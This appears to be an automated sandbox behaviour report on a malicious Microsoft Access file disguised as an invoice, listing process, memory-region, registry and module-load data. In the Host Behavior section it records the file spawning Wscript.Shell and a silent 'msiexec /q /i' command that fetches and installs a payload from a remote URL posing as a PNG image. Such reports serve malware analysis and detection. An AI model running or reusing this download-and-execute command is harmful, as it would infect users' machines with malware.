18f0b09725c3f4cea286aae7fceaec0cd6e49f90c9aa72dcc9c6d748bfe716cd (SHA256)
October_Invoiceb91a6edbc0ialmb3ce5ebc15abba7fe01fda93.accde
Microsoft Access Database
Created at 2019-01-21 16:18:00
Monitored Processes
Behavior Information - Grouped by Category
Process #1: msaccess.exe
501
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\office15\msaccess.exe |
| Command Line | "C:\Program Files\Microsoft Office\Office15\MSACCESS.EXE" |
| Initial Working Directory | C:\Users\JPenUM\Desktop\ |
| Monitor | Start Time: 00:00:22, Reason: Analysis Target |
| Unmonitor | End Time: 00:01:41, Reason: Self Terminated |
| Monitor Duration | 00:01:19 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe20 |
| Parent PID | 0x72c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ARRARNMKU\JPenUM |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
E8C
0x
E88
0x
E84
0x
E80
0x
E7C
0x
E78
0x
E74
0x
E70
0x
E50
0x
E4C
0x
E48
0x
E44
0x
E40
0x
E3C
0x
E38
0x
E30
0x
E2C
0x
E24
0x
E90
0x
E94
0x
E98
0x
E9C
0x
EA4
0x
EA8
0x
EB4
0x
EB8
0x
EC0
0x
EC4
0x
EC8
0x
ECC
0x
ED0
0x
F30
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00021fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00044fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x00187fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x003b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| msaccess.exe | 0x003c0000 | 0x0128efff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001290000 | 0x01290000 | 0x01291fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000012a0000 | 0x012a0000 | 0x012a9fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000012b0000 | 0x012b0000 | 0x012b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000012c0000 | 0x012c0000 | 0x012c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000012d0000 | 0x012d0000 | 0x012dffff | Private Memory | - |
|
|
|
- |
| pagefile_0x00000000012e0000 | 0x012e0000 | 0x012e1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000012f0000 | 0x012f0000 | 0x012f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001300000 | 0x01300000 | 0x01301fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001310000 | 0x01310000 | 0x0131ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001320000 | 0x01320000 | 0x01320fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001330000 | 0x01330000 | 0x01331fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001340000 | 0x01340000 | 0x01340fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001350000 | 0x01350000 | 0x01350fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001360000 | 0x01360000 | 0x0136ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001370000 | 0x01370000 | 0x01371fff | Pagefile Backed Memory | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db | 0x01380000 | 0x0139ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000013a0000 | 0x013a0000 | 0x013a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| comdlg32.dll.mui | 0x013b0000 | 0x013bcfff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x00000000013c0000 | 0x013c0000 | 0x013c1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000013d0000 | 0x013d0000 | 0x013d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000013e0000 | 0x013e0000 | 0x013fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001400000 | 0x01400000 | 0x0140ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001410000 | 0x01410000 | 0x01410fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x01426fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001430000 | 0x01430000 | 0x01431fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001440000 | 0x01440000 | 0x01440fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001450000 | 0x01450000 | 0x01450fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001460000 | 0x01460000 | 0x01460fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001470000 | 0x01470000 | 0x0156ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001570000 | 0x01570000 | 0x0216ffff | Pagefile Backed Memory | r |
|
|
|
- |
| c_1255.nls | 0x02170000 | 0x02180fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002190000 | 0x02190000 | 0x02192fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000021a0000 | 0x021a0000 | 0x021a2fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000021b0000 | 0x021b0000 | 0x021b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000021c0000 | 0x021c0000 | 0x021c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000021d0000 | 0x021d0000 | 0x021dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000021e0000 | 0x021e0000 | 0x021e2fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000021f0000 | 0x021f0000 | 0x021fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002200000 | 0x02200000 | 0x02202fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002210000 | 0x02210000 | 0x0224ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002250000 | 0x02250000 | 0x0232efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002330000 | 0x02330000 | 0x0233ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002340000 | 0x02340000 | 0x0243ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002440000 | 0x02440000 | 0x02441fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002450000 | 0x02450000 | 0x02461fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002470000 | 0x02470000 | 0x02481fff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x02490000 | 0x02493fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000024a0000 | 0x024a0000 | 0x024a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000024b0000 | 0x024b0000 | 0x025affff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x025b0000 | 0x0287efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002880000 | 0x02880000 | 0x028fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002900000 | 0x02900000 | 0x02927fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002930000 | 0x02930000 | 0x0296ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000002970000 | 0x02970000 | 0x02970fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002980000 | 0x02980000 | 0x02980fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002990000 | 0x02990000 | 0x02990fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000029a0000 | 0x029a0000 | 0x029a1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000029b0000 | 0x029b0000 | 0x02daffff | Private Memory | rw |
|
|
|
- |
| segoeui.ttf | 0x02db0000 | 0x02e2efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002e30000 | 0x02e30000 | 0x02e57fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002e60000 | 0x02e60000 | 0x02e61fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002e70000 | 0x02e70000 | 0x02e70fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002e80000 | 0x02e80000 | 0x02e80fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002e90000 | 0x02e90000 | 0x02e90fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ea0000 | 0x02ea0000 | 0x02eaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002eb0000 | 0x02eb0000 | 0x02eb0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ec0000 | 0x02ec0000 | 0x02ec0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ed0000 | 0x02ed0000 | 0x02ed0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ee0000 | 0x02ee0000 | 0x02fdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002fe0000 | 0x02fe0000 | 0x030dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000030e0000 | 0x030e0000 | 0x030e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000030f0000 | 0x030f0000 | 0x030f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003100000 | 0x03100000 | 0x03100fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003110000 | 0x03110000 | 0x03110fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003120000 | 0x03120000 | 0x0312ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003130000 | 0x03130000 | 0x0322ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003230000 | 0x03230000 | 0x03277fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003280000 | 0x03280000 | 0x03280fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003290000 | 0x03290000 | 0x03290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032a0000 | 0x032a0000 | 0x0369ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000036a0000 | 0x036a0000 | 0x0379ffff | Private Memory | rw |
|
|
|
- |
| segoeuisl.ttf | 0x037a0000 | 0x03837fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003840000 | 0x03840000 | 0x03887fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003890000 | 0x03890000 | 0x038cffff | Private Memory | rw |
|
|
|
- |
| staticcache.dat | 0x038d0000 | 0x041fffff | Memory Mapped File | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000a.db | 0x04200000 | 0x0422ffff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x04230000 | 0x04233fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004240000 | 0x04240000 | 0x04241fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004250000 | 0x04250000 | 0x04251fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004260000 | 0x04260000 | 0x04260fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004270000 | 0x04270000 | 0x04270fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004280000 | 0x04280000 | 0x0437ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004380000 | 0x04380000 | 0x0447ffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x04480000 | 0x044e5fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000044f0000 | 0x044f0000 | 0x044f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004500000 | 0x04500000 | 0x045fffff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x04600000 | 0x04603fff | Memory Mapped File | r |
|
|
|
- |
| {7cd55808-3d38-4dd5-90c9-62f0e6ee60d4}.2.ver0x0000000000000001.db | 0x04610000 | 0x04610fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x04620000 | 0x04623fff | Memory Mapped File | r |
|
|
|
- |
| {d8630a0e-22a9-4067-9f50-23d622cc2ce8}.2.ver0x0000000000000002.db | 0x04630000 | 0x04630fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004640000 | 0x04640000 | 0x04640fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000004650000 | 0x04650000 | 0x04657fff | Private Memory | rw |
|
|
|
- |
| oleaccrc.dll | 0x04660000 | 0x04660fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004670000 | 0x04670000 | 0x04671fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004680000 | 0x04680000 | 0x04680fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004690000 | 0x04690000 | 0x04690fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000046a0000 | 0x046a0000 | 0x0479ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000047a0000 | 0x047a0000 | 0x04b9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004ba0000 | 0x04ba0000 | 0x04ba0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004c90000 | 0x04c90000 | 0x04d8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004d90000 | 0x04d90000 | 0x05182fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000051c0000 | 0x051c0000 | 0x052bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000053a0000 | 0x053a0000 | 0x0549ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005520000 | 0x05520000 | 0x0561ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005620000 | 0x05620000 | 0x0571ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005720000 | 0x05720000 | 0x0591ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005920000 | 0x05920000 | 0x05d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005d20000 | 0x05d20000 | 0x06120fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006130000 | 0x06130000 | 0x06530fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006540000 | 0x06540000 | 0x06940fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006950000 | 0x06950000 | 0x06b4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006b50000 | 0x06b50000 | 0x0700ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007010000 | 0x07010000 | 0x0740ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000074d0000 | 0x074d0000 | 0x075cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000075d0000 | 0x075d0000 | 0x076cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007760000 | 0x07760000 | 0x0785ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007950000 | 0x07950000 | 0x0798ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000079b0000 | 0x079b0000 | 0x07aaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007b40000 | 0x07b40000 | 0x07c3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007c90000 | 0x07c90000 | 0x07d8ffff | Private Memory | rw |
|
|
|
- |
| office.odf | 0x07d90000 | 0x0828ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000082d0000 | 0x082d0000 | 0x083cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000083d0000 | 0x083d0000 | 0x084cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000084f0000 | 0x084f0000 | 0x085effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000086f0000 | 0x086f0000 | 0x087effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008ac0000 | 0x08ac0000 | 0x08bbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008bc0000 | 0x08bc0000 | 0x08dbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000035d30000 | 0x35d30000 | 0x35d3ffff | Private Memory | rwx |
|
|
|
- |
| d3d10warp.dll | 0x630d0000 | 0x631fbfff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 212 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
COM (1)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | Wscript.Shell | IUnknown | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
Registry (3)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CLASSES_ROOT\Licenses | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors | - |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 | data = } |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | msiexec /q /i https://jplymell.com/dmc/ImgFilePDF876356653680900897fXmfwICxiOWbsPLJpy.png | - |
|
1 |
Module (226)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x6d060000 |
|
1 | |
| Load | C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\1033\VBE7INTL.DLL | base_address = 0x74bf0000 |
|
1 | |
| Load | OLEAUT32.DLL | base_address = 0x75e00000 |
|
1 | |
| Load | ACEWSTR.DLL | base_address = 0x6d290000 |
|
1 | |
| Load | VBE7.DLL | base_address = 0x6c8e0000 |
|
44 | |
| Get Handle | c:\program files\microsoft office\office15\msaccess.exe | base_address = 0x3c0000 |
|
1 | |
| Get Handle | MSI.DLL | base_address = 0x72f50000 |
|
1 | |
| Get Handle | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x0 |
|
1 | |
| Get Handle | USER32 | base_address = 0x75d30000 |
|
1 | |
| Get Handle | oleaut32.dll | base_address = 0x75e00000 |
|
1 | |
| Get Handle | ole32.dll | base_address = 0x772b0000 |
|
1 | |
| Get Filename | - | process_name = c:\program files\microsoft office\office15\msaccess.exe, file_name_orig = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
2 | |
| Get Filename | Unknown module name | process_name = c:\program files\microsoft office\office15\msaccess.exe, file_name_orig = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| Get Address | Unknown module name | function = MsiProvideQualifiedComponentA, address_out = 0x72f7c331 |
|
1 | |
| Get Address | Unknown module name | function = MsiGetProductCodeA, address_out = 0x72f7ea84 |
|
1 | |
| Get Address | Unknown module name | function = MsiReinstallFeatureA, address_out = 0x73001cf6 |
|
1 | |
| Get Address | Unknown module name | function = MsiProvideComponentA, address_out = 0x7300f5d1 |
|
1 | |
| Get Address | Unknown module name | function = _MsoVBADigSigCallDlg@20, address_out = 0x6d18fe80 |
|
1 | |
| Get Address | Unknown module name | function = _MsoVbaInitSecurity@4, address_out = 0x6d118951 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFIEPolicyAndVersion@8, address_out = 0x6d10cd31 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFAnsiCodePageSupportsLCID@8, address_out = 0x6d11882e |
|
1 | |
| Get Address | Unknown module name | function = _MsoFInitOffice@20, address_out = 0x6d10cd4b |
|
1 | |
| Get Address | Unknown module name | function = _MsoUninitOffice@4, address_out = 0x6d0c96db |
|
1 | |
| Get Address | Unknown module name | function = _MsoFGetFontSettings@20, address_out = 0x6d0c1af9 |
|
1 | |
| Get Address | Unknown module name | function = _MsoRgchToRgwch@16, address_out = 0x6d0c9bae |
|
1 | |
| Get Address | Unknown module name | function = _MsoHrSimpleQueryInterface@16, address_out = 0x6d0c34e1 |
|
1 | |
| Get Address | Unknown module name | function = _MsoHrSimpleQueryInterface2@20, address_out = 0x6d0c3523 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFCreateControl@36, address_out = 0x6d0c4a26 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFLongLoad@8, address_out = 0x6d1c1250 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFLongSave@8, address_out = 0x6d1c1259 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFGetTooltips@0, address_out = 0x6d0fdfac |
|
1 | |
| Get Address | Unknown module name | function = _MsoFSetTooltips@4, address_out = 0x6d122845 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFLoadToolbarSet@24, address_out = 0x6d10dd8b |
|
1 | |
| Get Address | Unknown module name | function = _MsoFCreateToolbarSet@28, address_out = 0x6d0c23c9 |
|
1 | |
| Get Address | Unknown module name | function = _MsoHpalOffice@0, address_out = 0x6d0cc568 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFWndProcNeeded@4, address_out = 0x6d0c18d2 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFWndProc@24, address_out = 0x6d0c2a70 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFCreateITFCHwnd@20, address_out = 0x6d0c1925 |
|
1 | |
| Get Address | Unknown module name | function = _MsoDestroyITFC@4, address_out = 0x6d0c958b |
|
1 | |
| Get Address | Unknown module name | function = _MsoFPitbsFromHwndAndMsg@12, address_out = 0x6d0c8820 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFGetComponentManager@4, address_out = 0x6d0c35a4 |
|
1 | |
| Get Address | Unknown module name | function = _MsoMultiByteToWideChar@24, address_out = 0x6d0cac03 |
|
1 | |
| Get Address | Unknown module name | function = _MsoWideCharToMultiByte@32, address_out = 0x6d0c4d33 |
|
1 | |
| Get Address | Unknown module name | function = _MsoHrRegisterAll@0, address_out = 0x6d18f8b6 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFSetComponentManager@4, address_out = 0x6d0cc179 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFCreateStdComponentManager@20, address_out = 0x6d0c19d5 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFHandledMessageNeeded@4, address_out = 0x6d0c6736 |
|
1 | |
| Get Address | Unknown module name | function = _MsoPeekMessage@8, address_out = 0x6d0c649f |
|
1 | |
| Get Address | Unknown module name | function = _MsoFCreateIPref@28, address_out = 0x6d0bf9cf |
|
1 | |
| Get Address | Unknown module name | function = _MsoDestroyIPref@4, address_out = 0x6d0c9320 |
|
1 | |
| Get Address | Unknown module name | function = _MsoChsFromLid@4, address_out = 0x6d0bf864 |
|
1 | |
| Get Address | Unknown module name | function = _MsoCpgFromChs@4, address_out = 0x6d0c1cc5 |
|
1 | |
| Get Address | Unknown module name | function = _MsoSetLocale@4, address_out = 0x6d0bf984 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFSetHMsoinstOfSdm@4, address_out = 0x6d0c198e |
|
1 | |
| Get Address | Unknown module name | function = _MsoSetVbaInterfaces@8, address_out = 0x6d18ff8d |
|
1 | |
| Get Address | Unknown module name | function = _MsoGetControlInstanceId@8, address_out = 0x6d1686e7 |
|
1 | |
| Get Address | Unknown module name | function = SysFreeString, address_out = 0x75e03e59 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLib, address_out = 0x75e10aa2 |
|
1 | |
| Get Address | Unknown module name | function = RegisterTypeLib, address_out = 0x75e21ea6 |
|
1 | |
| Get Address | Unknown module name | function = QueryPathOfRegTypeLib, address_out = 0x75e3351b |
|
1 | |
| Get Address | Unknown module name | function = UnRegisterTypeLib, address_out = 0x75e31ca9 |
|
2 | |
| Get Address | Unknown module name | function = OleTranslateColor, address_out = 0x75e326fa |
|
1 | |
| Get Address | Unknown module name | function = OleCreateFontIndirect, address_out = 0x75e2352f |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePictureIndirect, address_out = 0x75e23df8 |
|
1 | |
| Get Address | Unknown module name | function = OleLoadPicture, address_out = 0x75e67c49 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrameIndirect, address_out = 0x75e693fc |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrame, address_out = 0x75e6944a |
|
1 | |
| Get Address | Unknown module name | function = OleIconToCursor, address_out = 0x75e6776e |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLibEx, address_out = 0x75e107b7 |
|
2 | |
| Get Address | Unknown module name | function = OleLoadPictureEx, address_out = 0x75e670a1 |
|
1 | |
| Get Address | Unknown module name | function = GetSystemMetrics, address_out = 0x75d467cf |
|
1 | |
| Get Address | Unknown module name | function = MonitorFromWindow, address_out = 0x75d43622 |
|
1 | |
| Get Address | Unknown module name | function = MonitorFromRect, address_out = 0x75d40ca1 |
|
1 | |
| Get Address | Unknown module name | function = MonitorFromPoint, address_out = 0x75d394c9 |
|
1 | |
| Get Address | Unknown module name | function = EnumDisplayMonitors, address_out = 0x75d434a3 |
|
1 | |
| Get Address | Unknown module name | function = GetMonitorInfoA, address_out = 0x75d3c34e |
|
1 | |
| Get Address | Unknown module name | function = EnumDisplayDevicesA, address_out = 0x75d3c204 |
|
1 | |
| Get Address | Unknown module name | function = DispCallFunc, address_out = 0x75e13dcf |
|
1 | |
| Get Address | Unknown module name | function = CreateTypeLib2, address_out = 0x75e18e70 |
|
1 | |
| Get Address | Unknown module name | function = VarDateFromUdate, address_out = 0x75e17684 |
|
1 | |
| Get Address | Unknown module name | function = VarUdateFromDate, address_out = 0x75e1cc98 |
|
1 | |
| Get Address | Unknown module name | function = GetAltMonthNames, address_out = 0x75e4903a |
|
1 | |
| Get Address | Unknown module name | function = VarNumFromParseNum, address_out = 0x75e16231 |
|
1 | |
| Get Address | Unknown module name | function = VarParseNumFromStr, address_out = 0x75e15fea |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR4, address_out = 0x75e23f94 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR8, address_out = 0x75e24e9e |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromDate, address_out = 0x75e4db72 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromI4, address_out = 0x75e32a8c |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromCy, address_out = 0x75e4d737 |
|
1 | |
| Get Address | Unknown module name | function = VarR4FromDec, address_out = 0x75e4e015 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromTypeInfo, address_out = 0x75e4cc3d |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromGuids, address_out = 0x75e4d1c4 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetRecordInfo, address_out = 0x75e4d48c |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetRecordInfo, address_out = 0x75e4d4c6 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetIID, address_out = 0x75e4d509 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetIID, address_out = 0x75e1e7bb |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCopyData, address_out = 0x75e1e496 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayAllocDescriptorEx, address_out = 0x75e1ddf1 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCreateEx, address_out = 0x75e4d53f |
|
1 | |
| Get Address | Unknown module name | function = VarFormat, address_out = 0x75e52055 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatDateTime, address_out = 0x75e520ea |
|
1 | |
| Get Address | Unknown module name | function = VarFormatNumber, address_out = 0x75e52151 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatPercent, address_out = 0x75e521f5 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatCurrency, address_out = 0x75e52288 |
|
1 | |
| Get Address | Unknown module name | function = VarWeekdayName, address_out = 0x75e52335 |
|
1 | |
| Get Address | Unknown module name | function = VarMonthName, address_out = 0x75e523d5 |
|
1 | |
| Get Address | Unknown module name | function = VarAdd, address_out = 0x75e25934 |
|
1 | |
| Get Address | Unknown module name | function = VarAnd, address_out = 0x75e25a98 |
|
1 | |
| Get Address | Unknown module name | function = VarCat, address_out = 0x75e259b4 |
|
1 | |
| Get Address | Unknown module name | function = VarDiv, address_out = 0x75e7e405 |
|
1 | |
| Get Address | Unknown module name | function = VarEqv, address_out = 0x75e7ef07 |
|
1 | |
| Get Address | Unknown module name | function = VarIdiv, address_out = 0x75e7f00a |
|
1 | |
| Get Address | Unknown module name | function = VarImp, address_out = 0x75e7ef47 |
|
1 | |
| Get Address | Unknown module name | function = VarMod, address_out = 0x75e7f15e |
|
1 | |
| Get Address | Unknown module name | function = VarMul, address_out = 0x75e7dbd4 |
|
1 | |
